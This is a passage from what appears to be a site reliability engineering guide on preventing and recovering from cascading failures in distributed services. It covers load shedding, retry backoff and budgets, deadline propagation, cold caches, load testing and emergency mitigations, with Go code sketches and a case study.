109This is often not a good assumption due to geography; see also Job and Data Organization.
110An instructive exercise, left for the reader: write a simple simulator and see how the amount of useful work the backend can do varies with how much it’s overloaded and how many retries are permitted.
111Sometimes you find that a meaningful proportion of your actual serving capacity comes from serving out of a cache, and if you lost access to that cache, you wouldn’t actually be able to serve that many queries. A similar observation holds for latency: a cache can help you achieve latency goals (by lowering the average response time when the query is servable from cache) that you possibly couldn’t meet without that cache.
| true | true | true | null |
2024-10-12 00:00:00
|
2017-01-01 00:00:00
| null |
article
|
sre.google
|
Google SRE
| null | null |
38,278,386 |
https://github.com/borisRadonic/RTSHA
|
GitHub - borisRadonic/RTSHA: Real Time Safety Heap Allocator
|
Borisradonic
|
Good programming practices for real-time embedded applications include the rule that all values should be allocated on the stack if possible. There are some situations where this is not possible, such as when the size of a value is unknown or when vectors grow in size over time.
In those situations, memory must be allocated dynamically from the heap using heap allocator functions like **malloc**() and **free**().
There are various heap allocation algorithms used across platforms, such as Dlmalloc, Phkmalloc, ptmalloc, jemalloc, Google Chrome's PartitionAlloc, and the glibc heap allocator. While each has its benefits, they aren't tailored for hard real-time environments prioritizing speed, determinism, minimal fragmentation, and memory safety.
**Real Time Safety Heap Allocator** is an ultra-fast memory management system suitable for bare metal platforms or in conjunction with small RT OS for several reasons:
- **Memory Management**: Heap algorithms are responsible for managing dynamic memory allocation and deallocation in a system. On platforms where the operating system is absent or minimal, managing memory becomes crucial. The RTSHA algorithms ensure efficient allocation and deallocation of memory resources, minimize fragmentation, and avoid undefined behavior.
- **Deterministic Behavior**: These platforms often run real-time or safety-critical applications where predictability and determinism are vital. RTSHA algorithms provide guarantees on the worst-case execution time for memory allocation and deallocation operations. This predictability ensures that the system can meet its timing constraints consistently.
- **Certification Requirements**: Safety-critical systems often require compliance with industry standards and regulations, such as DO-178C for avionics, ISO 26262 for automotive, or IEC 61508 for industrial control systems. These standards emphasize the need for certified software components, including memory management. High code quality, good documentation, and the standards used during the development of RTSHA (such as MISRA) can help meet certification requirements, accelerate and streamline the certification process, and demonstrate the reliability and robustness of the resulting systems.
- **Resource Optimization**: Bare metal platforms typically have limited resources, including memory. RTSHA optimizes memory utilization by minimizing fragmentation and efficiently managing memory allocation requests. This optimization is crucial for maximizing the available resources and ensuring the system operates within its limitations.
Overall, using the RTSHA on bare metal platforms enhances memory management, promotes determinism, ensures memory safety, meets some important safety certification requirements, and optimizes resource utilization. These factors are essential for developing reliable, predictable, and secure systems in safety-critical environments.
- About RTSHA🌌
- RTSHA Algorithms🧠
- Modern C++ and STL📚
- Project Status🏗
- Building🛠
- Documentation📖
- Examples💡
**Predictable Execution Time**: The worst-case execution time of the C 'malloc' and 'free' functions and the C++ 'new' and 'delete' operators must be deterministic and independent of application data.
**Memory Pool Preservation**: The algorithm must strive to minimize the likelihood of exhausting the memory pool. This can be achieved by reducing fragmentation and minimizing memory waste.
**Fragmentation Management**: The algorithms should effectively manage and reduce external fragmentation, which can limit the amount of available free memory.
**Defined Behavior**: The allocator must aim to eliminate any undefined behavior to ensure consistency and reliability in its operations.
**Functional Safety**: The allocator must adhere to the principles of functional safety. It should consistently perform its intended function during normal and abnormal conditions. Its design must consider and mitigate possible failure modes, errors, and faults.
- *When we talk about 'functional safety' in RTSHA, we are not referring to 'security'. "Functional safety" refers to the aspect of a system's design that ensures it operates correctly in response to its inputs and failures, minimizing risk of physical harm, while "security" refers to the measures taken to protect a system from unauthorized access, disruption, or damage.*
**Error Detection and Handling**: The allocator should have mechanisms to detect and handle memory allocation errors or failures. This can include robust error reporting, and fallback or recovery strategies in case of allocation failures.
**Support for Different Algorithms**: The allocator should be flexible enough to support different memory allocation algorithms, allowing it to be adapted to the specific needs of different applications.
**Configurability**: The allocator should be configurable to suit the requirements of specific platforms and applications. This includes adjusting parameters like the size of the memory pool, the size of allocation blocks, and the allocation strategy.
**Efficiency**: The allocator should be efficient, in terms of both time and space. It should aim for minimal overhead and quick allocation and deallocation times.
**Readability and Maintainability**: The code for the allocator should be clear, well-documented, and easy to maintain. This includes adhering to good coding practices, such as using meaningful variable names and including comments that explain the code.
**Compatibility**: The allocator should be compatible with the system it is designed for and work well with other components of the system.
There are several different algorithms that can be used for heap allocation supported by RTSHA:
**Small Fix Memory Pages**
This algorithm is an approach to memory management that is often used in specific situations where objects of a certain size are frequently allocated and deallocated. Using a 'fixed chunk size' algorithm greatly simplifies the memory allocation process and reduces fragmentation.
The memory is divided into pages of chunks (blocks) of a fixed size (32, 64, 128, 256, and 512 bytes). When an allocation request comes in, it can simply be given one of these blocks. This means that the allocator doesn't have to search through the heap to find a block of the right size, which can improve performance. The memory of free blocks is used as 'free list' storage. The list is implemented using a standard linked list. However, by enabling the precompiler option USE_STL_LIST, the STL version of the forward list can also be utilized. There isn't a significant performance difference between the two implementations.
Deallocations are also straightforward, as the block is added back to the list of available chunks. There's no need to merge adjacent free blocks, as there is with some other allocation strategies, which can also improve performance.
However, fixed chunk size allocation is not a good fit for all scenarios. It works best when the majority of allocations are of the same size, or of a small number of different sizes. If allocation requests are of widely varying sizes, then this approach can lead to a lot of wasted memory, as small allocations take up an entire chunk and large allocations require multiple chunks.
The Small Fix Memory Pages algorithm is also used internally by the "Power Two Memory Pages" and "Big Memory Pages" algorithms.
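For illustration only, and not RTSHA's actual implementation or API, a fixed-chunk page of this kind can be sketched as follows; the free list is threaded through the unused blocks themselves, so both allocation and deallocation are O(1) pointer operations.

```
// Illustrative sketch only (not RTSHA code): a fixed-chunk page whose free
// list lives inside the unused blocks. chunkSize must be at least
// sizeof(FreeNode) and suitably aligned for this to be valid.
#include <cstddef>
#include <cstdint>

class FixedChunkPage
{
public:
    FixedChunkPage(void* memory, std::size_t chunkSize, std::size_t chunkCount)
        : _freeHead(nullptr)
    {
        // Thread the free list through the raw memory: each free chunk
        // stores a pointer to the next free chunk.
        std::uint8_t* base = static_cast<std::uint8_t*>(memory);
        for (std::size_t i = 0U; i < chunkCount; ++i)
        {
            FreeNode* node = reinterpret_cast<FreeNode*>(base + i * chunkSize);
            node->next = _freeHead;
            _freeHead = node;
        }
    }

    void* allocate()
    {
        if (_freeHead == nullptr)
        {
            return nullptr; // page exhausted
        }
        FreeNode* node = _freeHead; // O(1): pop the head of the free list
        _freeHead = node->next;
        return node;
    }

    void free(void* ptr)
    {
        // O(1): push the chunk back onto the free list; no merging needed.
        FreeNode* node = static_cast<FreeNode*>(ptr);
        node->next = _freeHead;
        _freeHead = node;
    }

private:
    struct FreeNode { FreeNode* next; };
    FreeNode* _freeHead;
};
```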
**Power Two Memory Pages**
This algorithm is a more intricate system that exclusively allows blocks of sizes that are powers of two. This design makes merging free blocks back together easier and significantly reduces fragmentation. The core of this algorithm is based on an array of free lists. Each list corresponds to one group of power-of-two sizes. For instance, there's a dedicated list for 64-byte free blocks, another for 128-byte blocks, and so on. This structured approach ensures that blocks of a specific size are readily available, optimizing memory management and access. This method ensures efficient block allocation and deallocation operations, making the most of the power-of-two size constraint. Utilizing the combination of power-of-two block sizes with an array of free lists and a binary search mechanism, this algorithm strikes a balance between memory efficiency and operational speed. This is a fairly efficient method of allocating memory, particularly useful for systems where memory fragmentation is an important concern. The algorithm divides memory into partitions to try to minimize fragmentation and the 'Best Fit' algorithm searches the page to find the smallest block that is large enough to satisfy the allocation. Furthermore, this system is resistant to breakdowns due to its algorithmic approach to allocating and deallocating memory. The coalescing operation helps ensure that large contiguous blocks of memory can be reformed after they are freed, reducing the likelihood of fragmentation over time. Coalescing relies on having free blocks of the same size available, which is not always the case, and so this system does not completely eliminate fragmentation but rather aims to minimize it.
**Big Memory Pages**
Note: This algorithm is primarily designed for test purposes, especially for systems with constrained memory. When compared to the "Small Fixed Memory Pages" and "Power Two Memory Pages" algorithms, this approach may be relatively slow. The "Big Memory Pages" algorithm employs the "Best Fit" strategy, which is complemented by a "Red-Black" balanced tree. The Red-Black tree ensures worst-case guarantees for insertion, deletion, and search times, making it predictable in performance. A key distinction between this system and the "Power Two Memory Pages" algorithm is in how they handle memory blocks. Unlike the latter, "Big Memory Pages" does not restrict memory to be partitioned exclusively into power-of-two sizes. Instead, variable block sizes are allowed, providing more flexibility. Additionally, once memory blocks greater than 512 bytes are released, they are promptly merged or coalesced, optimizing the memory usage. Despite its features, it's essential to understand the specific use-cases and limitations of this algorithm and to choose the most suitable one based on the system's requirements and constraints.
The use of 'Small Fixed Memory Pages' in combination with 'Power Two Memory Pages' is recommended for all real time systems.
Writing a correct and efficient memory allocator is a non-trivial task. STL provides many algorithms for sorting, searching, manipulating and processing data. These algorithms can be useful for managing metadata about memory blocks, such as free and used blocks. Using existing algorithms and data structures from the C++ Standard Template Library (STL) has several advantages over developing your own, such as:
- Efficiency: The STL is designed by experts who have fine-tuned the algorithms and data structures for performance. They generally offer excellent time and space complexity, and have been optimized over many years of use and improvement.
- Reliability: STL components have been thoroughly tested and are widely used. This means they are reliable and less likely to contain bugs compared to new, untested code.
- Readability and Maintainability: Using standard algorithms and data structures makes code more readable and easier to understand for other developers familiar with C++.
- Productivity: It's usually faster to use an existing STL component than to write a new one from scratch.
- Compatibility: STL components are designed to work together seamlessly, and using them can help ensure compatibility with other C++ code and libraries.
This project is currently a work in progress. The release of the initial version is tentatively scheduled for December. Please consider this before using the code.
Building
Windows:
```
Open ide/vs2022/RTSHALibrary.sln in Visual Studio 2022 and build.
```
| true | true | true |
Real Time Safety Heap Allocator. Contribute to borisRadonic/RTSHA development by creating an account on GitHub.
|
2024-10-12 00:00:00
|
2023-06-29 00:00:00
|
https://opengraph.githubassets.com/3c18b949ce10d352663d1efc32bbbba780041d044bab090f725edfeeefa7ecb1/borisRadonic/RTSHA
|
object
|
github.com
|
GitHub
| null | null |
24,509,802 |
https://www.teslaoracle.com/2020/09/17/first-fsd-computer-retrofit-mcu2-upgrade-europe/
| null | null | null | true | false | false | null | null | null | null | null | null | null | null | null |
30,280,651 |
https://github.com/readme/guides/root-cause
|
What we talk about when we talk about ‘root cause’
|
John Allspaw
|
What do we talk about when we talk about 'root cause'? To begin, consider this passage from *Thinking By Machine* (deLatil, 1956), p. 153:
*“Imagine an iron bar thrust into an electric furnace. The bar lengthens, and the “cause” of the lengthening is said to be the heat of the furnace. One is astonished—why should it not be the introduction of the bar into the furnace? Or the existence of the bar? Or the fact that the bar had been previously kept at a lower temperature? None of these possibilities can be termed secondary causes; they are all primary determining causes without which the lengthening phenomenon could not have occurred.”*
In recent years, the understanding that failure in complex systems requires multiple contributors coming together to produce these surprising events that we call *incidents* has gained traction. Much has been written and presented about this hallmark phenomenon of complex systems, and while this perspective isn’t yet considered a “mainstream” view, I suspect it aligns with what all experienced software engineers intuitively understand.
In his seminal paper *How Complex Systems Fail* (Cook, 1998), my colleague Dr. Richard Cook put it this way:
*3) Catastrophe requires multiple failures—single point failures are not enough. The array of defenses works. System operations are generally successful. Overt catastrophic failure occurs when small, apparently innocuous failures join to create opportunity for a systemic accident. Each of these small failures is necessary to cause catastrophe but only the combination is sufficient to permit failure. Put another way, there are many more failure opportunities than overt system accidents. Most initial failure trajectories are blocked by designed system safety components. Trajectories that reach the operational level are mostly blocked, usually by practitioners. *
Another description of this perspective was made by Ryan Kitchens at SRECon Americas in 2019:
*“There is no root cause. The problem with this term isn't just that it's singular or that the word root is misleading: there's more. Trying to find causes at all is problematic...looking for causes to explain an incident limits what you'll find and learn. And the irony is that root cause analysis is built on this idea that incidents can be fully comprehended. They can't. We already have a better phrase for this, and it sounds way cooler: it's called a perfect storm. In this way, separating out causes and breaking down incidents into their multiple contributing factors, we're able to see that the things that led to an incident are either always or transiently present. An incident is just the first time they combined into a perfect storm of normal things that went wrong at the same time.”*
From an abstract perspective, language that describes causality is, ostensibly, *value-neutral*. But the term ‘root cause’ is almost always used in the context of untoward or negative outcomes, and not in situations where an outcome is deemed a success. Rarely does someone demand a search for the ‘root cause’ of a successful product launch, for example. It seems widely accepted that successful outcomes in complex systems come from many influences that come together in a positive way. Failures aren’t often viewed the same way.
Rather than restating what’s been written and spoken about (such as the references linked above), I’d like to explore in this article what seems to keep people using the term ‘root cause’ despite the growing skepticism of its value.
What makes this term attractive for the people using it? Is it simply used as shorthand language, as a way to summarize an otherwise too-detailed explanation for the reader or listener? Or is it used to simplify a story, to redirect people’s attention to a specific and bounded area so something—anything—practical can be done?
Research literature on this topic reveals that in descriptions of accidents and incidents, use of the term ‘root cause’ (or even multiple ‘root’ causes) serves *social* purposes more than *technical* ones.
## Providing reassurance about the future
Labeling something as a ‘root cause’ helps people cope with the (sometimes implicit) anxiety that comes along with the experience of incidents. When people are observing their systems working well (or at least well *enough*), and a seemingly out-of-nowhere incident happens, the contrast can be jarring, to say the least. We can go from feeling confident about how well we understand our technical systems to suddenly feeling astonished and quite uncertain.
The lived experience of people responding to these situations can leave them wanting for something—*anything*—to help them feel better about the future. Likewise, technical leaders are also not immune to the feeling of unease that incidents tend to bring with them. If this can happen unexpectedly, what else can? Do these events represent harbingers of more significant ones to come? What do these incidents say about the organization’s abilities...or my own leadership skills?
Incidents have a way of producing genuine and unsettling dismay; it’s understandable to search for an explanation, a cause, that we can be sure of.
In this way, labeling some specific part of the story as a 'root cause' helps us. It provides some comfort that we’ve got a handle on things we previously didn’t. There’s a term for this phenomenon: *Nietzschean anxiety*. It reflects what the German philosopher wrote in *Twilight of the Idols*:
*“With the unknown, one is confronted with danger, discomfort, and care; the first instinct is to abolish these painful states. First principle: any explanation is better than none. Because it is fundamentally just our desire to be rid of an unpleasant uncertainty, we are not very particular about how we get rid of it: the first interpretation that explains the unknown in familiar terms feels so good that one “accepts it as true”…. The “why” shall, if at all possible, result not in identifying the cause for its own sake, but in identifying a cause that is comforting, liberating, and relieving. A second consequence of this need is that we identify as a cause something already familiar or experienced, something already inscribed in memory. Whatever is novel or strange or never before experienced is excluded.”*
In other words, our experience with incidents can be so disturbing to us that we feel a strong and immediate desire to identify what “caused” an event, so we can then do something (which typically means fixing something) in order to regain a sense of being in control. This is what John Carroll (Carroll, 1995) called *root cause seduction*.
On the face of it, this idea seems understandable, even relatable. But we have to acknowledge that labeling something as a ‘root cause’ reflects a cherry-picked perspective; it highlights one aspect of a complex event and discounts others. The label performs a sort of sleight-of-hand or redirection like a magician might, akin to saying “look right here—don’t concern yourself with other things.”
## Purposes and audiences
It can be useful to understand the context in which the term “root cause” is being used.
Who is the author (or speaker) using it? What are they hoping to convey by using the term? Who is their audience? How do they understand the use of ‘root cause’ in the context of what they are reading?
If it is used in a conversation amongst engineers on the same team, it might be used simply as a way to emphasize or highlight a specific location they believe warrants attention. Quite often, this usage reflects something better conveyed as a *trigger* rather than a *cause*. The term ‘trigger’ tends to do a better job of describing a specific dynamic that “activates” already existing conditions, some of which might have been latent in the code or architecture’s arrangement for some time.
If it is used in a legal agreement or other contractual documents, the term tends to intentionally have an ambiguous meaning so as to allow for flexibility of interpretation that frequently comes with legal language.
When it comes to articles companies publish about incidents their service(s) or products have experienced, the term ‘root cause’ tends to be used in very specific ways. The core **audience** for these public posts is both current and potential future customers. The primary **purpose** is to provide a) confidence that the company understands the event sufficiently and b) some form of commitment to improving the situation in the future. By labeling a specific component as a “root cause” (or even a finite number of “root causes”) authors of these posts can project much more certainty or confidence than if they were to acknowledge the genuine complexity of the incident.
## A challenge for readers and listeners
I’ll offer a few questions to consider the next time you read or hear the term ‘root cause’:
- What is the author (or speaker) trying to convey by using the term?
- What agenda(s) might the author (or speaker) have in their version of the story, other than providing the richest description they can?
- What else? What details seem to be noticeably absent in the story you’re being told?
- What questions can you imagine being dismissed or discounted by the storyteller, if you had the chance to ask them?
Questions like these are garden-variety critical thinking exercises. But they might help us explore what the story doesn’t tell us, or what might be missing in the story.
| true | true | true |
Instead of finding the ‘root cause’ to incidents and issues, @allspaw says it’s more accurate to try and break down what created the ‘perfect storm’:
|
2024-10-12 00:00:00
|
2022-02-08 00:00:00
|
object
|
github.com
|
GitHub
| null | null |
|
4,456,819 |
http://evanmuehlhausen.com/data-mining-local-radio-with-nodejs.html
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
1,151,000 |
http://www.economist.com/world/united-states/displaystory.cfm?story_id=15549324&source=hptextfeature
|
Fibre in paradise
| null |
United States | Cabling America
# Fibre in paradise
## How a small city in Virginia is replacing coal mines with tech jobs
Bristol
Illustration by Peter Schrank
This article appeared in the United States section of the print edition under the headline “Fibre in paradise”
| true | true | true |
How a small city in Virginia is replacing coal mines with tech jobs
|
2024-10-12 00:00:00
|
2010-02-18 00:00:00
|
Article
|
economist.com
|
The Economist
| null | null |
|
40,273,392 |
https://www.biorxiv.org/content/10.1101/2024.04.18.590112v1
|
Neural compass in the human brain during naturalistic virtual navigation
|
Zhengang Lu; Joshua B Julian; Geoffrey K Aguirre; Russell A Epstein
|
## SUMMARY
Humans and animals maintain a consistent representation of their facing direction during spatial navigation. In rodents, head direction cells are believed to support this “neural compass”, but identifying a similar mechanism in humans during dynamic naturalistic navigation has been challenging. To address this issue, we acquired fMRI data while participants freely navigated through a virtual reality city. Encoding model analyses revealed voxel clusters in retrosplenial complex and superior parietal lobule that exhibited reliable tuning as a function of facing direction. Crucially, these directional tunings were consistent across perceptually different versions of the city, spatially separated locations within the city, and motivationally distinct phases of the behavioral task. Analysis of the model weights indicated that these regions may represent facing direction relative to the principal axis of the environment. These findings reveal specific mechanisms in the human brain that allow us to maintain a sense of direction during naturalistic, dynamic navigation.
### Competing Interest Statement
The authors have declared no competing interest.
## Footnotes
5. Lead Contact
| true | true | true |
Humans and animals maintain a consistent representation of their facing direction during spatial navigation. In rodents, head direction cells are believed to support this “neural compass”, but identifying a similar mechanism in humans during dynamic naturalistic navigation has been challenging. To address this issue, we acquired fMRI data while participants freely navigated through a virtual reality city. Encoding model analyses revealed voxel clusters in retrosplenial complex and superior parietal lobule that exhibited reliable tuning as a function of facing direction. Crucially, these directional tunings were consistent across perceptually different versions of the city, spatially separated locations within the city, and motivationally distinct phases of the behavioral task. Analysis of the model weights indicated that these regions may represent facing direction relative to the principal axis of the environment. These findings reveal specific mechanisms in the human brain that allow us to maintain a sense of direction during naturalistic, dynamic navigation. ### Competing Interest Statement The authors have declared no competing interest.
|
2024-10-12 00:00:00
|
2024-04-22 00:00:00
|
article
|
biorxiv.org
|
Biorxiv
| null | null |
|
33,423,548 |
https://ai.facebook.com/blog/protein-folding-esmfold-metagenomics/
| null | null | null | true | false | false | null | null | null | null | null | null | null | null | null |
22,263,692 |
https://www.usatoday.com/story/money/2019/12/11/what-gifts-should-you-avoid-at-work/4387605002/
|
Buy a gift for the boss? Here are some do's and don'ts for giving gifts at the office
|
Charisse Jones
|
# Buy a gift for the boss? Here are some do's and don'ts for giving gifts at the office
A faulty bulb knocked out an entire string of lights on your Christmas tree. You can't find that hot toy your nephew wanted anywhere. And you don't know when you'll have the time to clean the house before holiday guests arrive.
What else could go wrong?
How about you have to buy a gift for your office pod mate, and you don't have a clue what to get her?
Many workers feel the prospect of buying presents for their colleagues adds yet another layer of pressure to an already stressful season.
A LinkedIn survey found that 31% of employees say they feel they have to add co-workers to their gift-giving lists, and 40% wish their company would say gift-giving is off-limits.
A lot of the tension stems from not knowing what to buy. If your father-in-law doesn't like the sweater you bought him, there may be an awkward silence at the dinner table, but giving an inappropriate gift to a colleague or boss could lead to more severe consequences.
Horror stories abound. Philippe Weiss, president of the workplace legal compliance consultancy Seyfarth at Work, says he heard about one manager who gave his sales team bamboo toothbrushes. The recipients interpreted the gift as a dig at their oral hygiene.
An employee at another company put her job in peril when she gifted her boss with a book on how to be a better manager.
To avoid such faux pas, it makes sense for companies to put a gift policy in place so employees know what is and isn't acceptable. If your workplace doesn't set parameters, here are some tips Weiss says you might want to keep in mind.
**•Don't buy gifts that can be deemed too intimate.** Anything worn close to the body, from clothes to perfume, should be avoided, along with invites on excursions – such as a wine tasting – that could be seen as more romantic than collegial.
**•Don't shop for the boss.** It might be tempting to deliver a little extra holiday cheer to your managers, but generally speaking, they probably shouldn't accept. It's best to not put them in a position to have to say, "Thanks, but no thanks."
**•Don't make everyone chip in for a group gift.** When people are spending on everything from decorations to extra towels for visiting relatives, it's a good idea to allow members of your team to make their own decision on whether to contribute to the pot.
**•Don't give cash.** That, and even gift cards, could be taxed as income, Weiss says.
**•Do encourage "Secret Santa."** Let employees who want to participate pick names randomly. Then come up with gift suggestions, and set a budget so no one breaks the bank.
**•Do split the bounty.** If a client sends over a giant plate of cookies or other treat, share it with your office mates. Don't forget to include the mailroom and maintenance staff.
**•Do consider giving to the community.** Instead of having employees pick out picture frames and candles for their peers, why not donate as an office to a cause?
*Follow Charisse Jones on Twitter @charissejones*
| true | true | true |
Many workers feel the prospect of buying presents for their colleagues adds yet another layer of pressure to an already hectic, stressful season.
|
2024-10-12 00:00:00
|
2019-12-11 00:00:00
|
article
|
usatoday.com
|
USA TODAY
| null | null |
|
9,162,653 |
https://twitter.com/jeffbarr/status/574241836228681728
|
x.com
| null | null | true | true | false | null |
2024-10-12 00:00:00
| null | null | null | null |
X (formerly Twitter)
| null | null |
21,612,780 |
https://blog.commsor.com/what-minecraft-taught-me-about-community/
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
30,696,435 |
https://www.politico.eu/article/nadine-dorries-digital-minister-big-tech/
|
Nadine Dorries, Britain’s Big Tech slayer
|
Annabelle Dickson
|
LONDON — Britain's digital minister has Big Tech in her sights — but critics worry she's not sufficiently across the details for her reforms to stick.
Promoted to Boris Johnson's top team last September, Digital, Culture, Media and Sport Secretary Nadine Dorries initially made headlines with enthusiastic attacks on "woke" culture and because of her personal loyalty to the prime minister.
But the outspoken romantic novelist has also proved eager to ramp up pressure on tech platforms, both because of what she sees as their failure to deal with terrorist propaganda and child sexual abuse and, since Russia invaded Ukraine, as a vocal critic of disinformation online.
| true | true | true |
Britain among the first countries to attempt to regulate harmful speech online but how will the new rules balance freedom of speech?
|
2024-10-12 00:00:00
|
2022-03-14 00:00:00
|
article
|
politico.eu
|
POLITICO
| null | null |
|
4,947,570 |
http://asserttrue.blogspot.com/2012/12/going-on-software-design-feature-fast.html
|
Going on a Software-Design Feature Fast
|
Kas Thomas
|
Software makers should also reevaluate the process by which a feature becomes "required" and what it means for a feature to be "required."
I've been in tech for decades, and I've never yet encountered a software product that didn't contain at least one totally useless feature, a feature no one ever uses; the equivalent of the Scroll Lock key on a modern keyboard. The important point to note is that *all* software features, even the most obscure and/or useless ones, got into the product as a result of somebody's "requirement."
I propose that software makers go on a "feature fast" until the feature-addition process is not only well understood but re-imagined. (Let Marketing be a stakeholder in this process, but let it be only *one* of many stakeholders. Not the majority stakeholder.)
Until then, I offer the following exercises for purveyors of commercial software:
1. Implement *in situ* analytics (inside-the-app analytics) so that you can understand how users are spending their time when they work with the product. (A minimal sketch of what this can look like follows the list below.)
2. Find out (via built-in analytics) what the least-used feature of your product is. Get rid of it.
3. Repeat No. 2 for another 100 features. Replace them with API methods and helpful tooling (an SDK). Charge no money for the SDK.
4. Have you ever added an obscure feature because an important customer asked for it? If so, consider the following: Did you make the sale? Did the sale of the product *actually hinge* on that one feature? (Hopefully not. Hopefully the product's *core functionality* and *reputation for excellence* made the sale.) Five years later, is that customer still with you? Are they still using the feature? If not, why are you continuing to code-maintain, regression-test, document, and tech-support a one-off feature that's no longer needed?
5. Of all the UI elements that are in the user's face by default, find which ones are least-used. Of all the UI elements that are *not* readily visible, find those that are most-used. Consider ways to swap the two.
6. Try to determine how many features are in your product (develop your own methodology for this), then determine how many features are used by what percentage of customers. (When you have that data, visualize it in more than one way, graphically.) When you're done, ask yourself if you wouldn't be better off, from a resource allocation standpoint, if you stopped working on at-the-margin features and reinvested those dollars in making core features even more outstanding.
7. Obtain (via real-time analytics) a profile of a *given user's* favorite (or most-used) features and preemptively load those into memory, for that particular user, at startup time. Lazily load everything else, and in any case, don't single-task the entire loading process (and make the user stare at a splash screen). The preferential loading of modules according to a *user-specific profile* is essentially the equivalent of doing a custom build of the product on a per-customer basis, based on demonstrated customer needs. Isn't this what you should be aiming for?
8. Find out the extent to which customers are using your product under duress, and why. In other words, if your product is Microsoft Word, and you have customers who are still doing a certain amount of text editing in a lesser product (such as Wordpad), find out how many customers are doing that and why. Address the problem.
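In concrete terms, the instrumentation in exercise 1 can start as small as a feature-usage counter. The sketch below is illustrative only — every name is hypothetical, and a real product would batch these events and ship them to a telemetry backend rather than hold them in memory:

```typescript
// Minimal sketch of in-app ("in situ") feature analytics. All names are hypothetical.
type FeatureEvent = { feature: string; timestamp: number };

const usageLog: FeatureEvent[] = [];

// Call this from every feature entry point (menu item, toolbar button, keyboard shortcut).
export function recordFeatureUse(feature: string): void {
  usageLog.push({ feature, timestamp: Date.now() });
}

// Aggregate counts so the least-used features (see exercises 2 and 3) fall out directly.
export function usageCounts(): Map<string, number> {
  const counts = new Map<string, number>();
  for (const event of usageLog) {
    counts.set(event.feature, (counts.get(event.feature) ?? 0) + 1);
  }
  return counts;
}
```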
In tomorrow's post, I'm going to list some favorite software-design mantras that all people involved in building, testing, documenting, supporting, or marketing software products can (I hope) learn something from. Don't miss it.
| true | true | true |
Bioinformatics, genomics, and Javascript
|
2024-10-12 00:00:00
|
2012-12-20 00:00:00
| null | null |
blogspot.com
|
asserttrue.blogspot.com
| null | null |
40,426,536 |
https://arxiv.org/abs/2405.00801
|
"Ask Me Anything": How Comcast Uses LLMs to Assist Agents in Real Time
|
Scott Rome; Tianwen Chen; Raphael Tang; Luwei Zhou; Ferhan Ture
|
# Computer Science > Computation and Language
[Submitted on 1 May 2024 (v1), last revised 6 May 2024 (this version, v2)]
# Title:"Ask Me Anything": How Comcast Uses LLMs to Assist Agents in Real Time
View PDF HTML (experimental)Abstract:Customer service is how companies interface with their customers. It can contribute heavily towards the overall customer satisfaction. However, high-quality service can become expensive, creating an incentive to make it as cost efficient as possible and prompting most companies to utilize AI-powered assistants, or "chat bots". On the other hand, human-to-human interaction is still desired by customers, especially when it comes to complex scenarios such as disputes and sensitive topics like bill payment.
This raises the bar for customer service agents. They need to accurately understand the customer's question or concern, identify a solution that is acceptable yet feasible (and within the company's policy), all while handling multiple conversations at once.
In this work, we introduce "Ask Me Anything" (AMA) as an add-on feature to an agent-facing customer service interface. AMA allows agents to ask questions to a large language model (LLM) on demand, as they are handling customer conversations -- the LLM provides accurate responses in real-time, reducing the amount of context switching the agent needs. In our internal experiments, we find that agents using AMA versus a traditional search experience spend approximately 10% fewer seconds per conversation containing a search, translating to millions of dollars of savings annually. Agents that used the AMA feature provided positive feedback nearly 80% of the time, demonstrating its usefulness as an AI-assisted feature for customer care.
## Submission history
From: Ferhan Ture [view email]
**[v1]** Wed, 1 May 2024 18:31:36 UTC (422 KB)
**[v2]** Mon, 6 May 2024 16:15:32 UTC (422 KB)
| true | true | true |
Customer service is how companies interface with their customers. It can contribute heavily towards the overall customer satisfaction. However, high-quality service can become expensive, creating an incentive to make it as cost efficient as possible and prompting most companies to utilize AI-powered assistants, or "chat bots". On the other hand, human-to-human interaction is still desired by customers, especially when it comes to complex scenarios such as disputes and sensitive topics like bill payment. This raises the bar for customer service agents. They need to accurately understand the customer's question or concern, identify a solution that is acceptable yet feasible (and within the company's policy), all while handling multiple conversations at once. In this work, we introduce "Ask Me Anything" (AMA) as an add-on feature to an agent-facing customer service interface. AMA allows agents to ask questions to a large language model (LLM) on demand, as they are handling customer conversations -- the LLM provides accurate responses in real-time, reducing the amount of context switching the agent needs. In our internal experiments, we find that agents using AMA versus a traditional search experience spend approximately 10% fewer seconds per conversation containing a search, translating to millions of dollars of savings annually. Agents that used the AMA feature provided positive feedback nearly 80% of the time, demonstrating its usefulness as an AI-assisted feature for customer care.
|
2024-10-12 00:00:00
|
2024-05-01 00:00:00
|
/static/browse/0.3.4/images/arxiv-logo-fb.png
|
website
|
arxiv.org
|
arXiv.org
| null | null |
4,168,734 |
http://changemakrs.com/arnoldschwarzenegger/4feaa0bcbd25660008000001
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
9,824,214 |
https://en.wikipedia.org/wiki/JavaScript_Style_Sheets
|
JavaScript Style Sheets - Wikipedia
| null |
# JavaScript Style Sheets
|  |  |
| --- | --- |
| Internet media type | text/javascript |
| Developed by | Netscape Communications Corporation |
| Type of format | Style sheet language |
| Standard | Netscape's JavaScript-Based Style Sheets submission to the W3C |
**JavaScript Style Sheets** (**JSSS**) was a stylesheet language technology proposed by Netscape Communications in 1996 to provide facilities for defining the presentation of webpages.[1] It was an alternative to the Cascading Style Sheets (CSS) technology.[1]
Although Netscape submitted it to the World Wide Web Consortium (W3C), the technology was never accepted as a formal standard and it never gained acceptance in the web browser market. Only Netscape Communicator 4 implemented JSSS, with rival Internet Explorer choosing not to implement the technology. Soon after Netscape Communicator's release in 1997, Netscape stopped promoting JSSS, instead focusing on the rival CSS standard, which was also supported by Internet Explorer and had a much wider industry acceptance.
The follow-up to Netscape Communicator, Netscape 6 (released in 2000), dropped support for JSSS. It now remains little more than a historical footnote, with web developers generally unaware of its previous existence. The proposal did not become a W3C standard.
## Syntax
Using JavaScript code as a stylesheet, JSSS styles individual elements by modifying properties of a `document.tags` object. For example, the CSS:
```
h1 { font-size: 20pt; }
```
is equivalent to the JSSS:
```
document.tags.H1.fontSize = "20pt";
```
JSSS element names are case sensitive.
JSSS lacks the various CSS selector features, supporting only simple tag name, class and id selectors. On the other hand, since it is written using a complete programming language, stylesheets can include highly complex dynamic calculations and conditional processing. (In practice, however, this can be achieved using JavaScript to modify the stylesheets applicable to the document at runtime.) Because of this JSSS was often used in the creation of dynamic web pages.
### Example
The following example shows part of the source code of an HTML document:
```
<style type="text/javascript">
tags.H1.color = "red";
tags.p.fontSize = "20pt";
with (tags.H3) {
color = "green";
}
with (tags.H2) {
color = "red";
fontSize = "16pt";
